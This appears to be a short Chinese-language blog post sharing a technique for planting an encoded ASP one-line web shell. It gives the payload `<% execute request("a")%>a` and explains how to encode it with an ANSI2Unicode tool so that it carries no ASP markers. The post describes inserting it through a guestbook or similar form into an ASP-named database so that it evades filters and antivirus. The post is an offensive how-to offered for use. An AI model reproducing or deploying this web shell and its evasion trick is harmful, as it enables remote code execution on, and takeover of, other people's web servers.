一句話***的加密經驗分享

    一句話***的加密,個人感覺,如果碰上了asp後綴的數據庫,而且猜出了數據庫的路徑,那簡直就是管理員的惡夢。因爲加密後的一句話***沒有任何asp的 標示符!我們只要隨便找個可以提交信息的頁面,比如說留言板什麼的都可以,就可以把一句話***插到數據庫裏面。而加密後的一句話***是不會被過濾的。
       加密用的工具是ANSI2Unicode
       這個一句話要精心構造,加密後的一句話不能有"?"。我自己試驗了好久,都沒有搞定個別的問號。最後在網上看到一篇帖子,終於知道了怎麼寫這個一句話纔不 會出現問號。格式是:“<% execute request("a")%>”這是我在網上看到的。但是這句加密後最後會有個">",有被過濾的可能。我就又在最後加了一個"a",也就是 “<% execute request("a")%>a”加密後就完全沒有asp標示符了,所以肯定不會被過濾掉,基本上是無敵插入了。
       注意,這個一句話看似很普通,但是最重要的地方在%後面的那個“空格”和括號裏面的那個"a"!如果不這樣很有可能加密後會出現“?”。
       由於擔心加密後的一句話直接在網上貼出來,如果貼的多了,有可能被殺軟盯上,(只是擔心,我也不知道會不會)所以就只提供加密前的格式,需要的可以下去自己加密。

by:http://www.cqzh.cn/

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章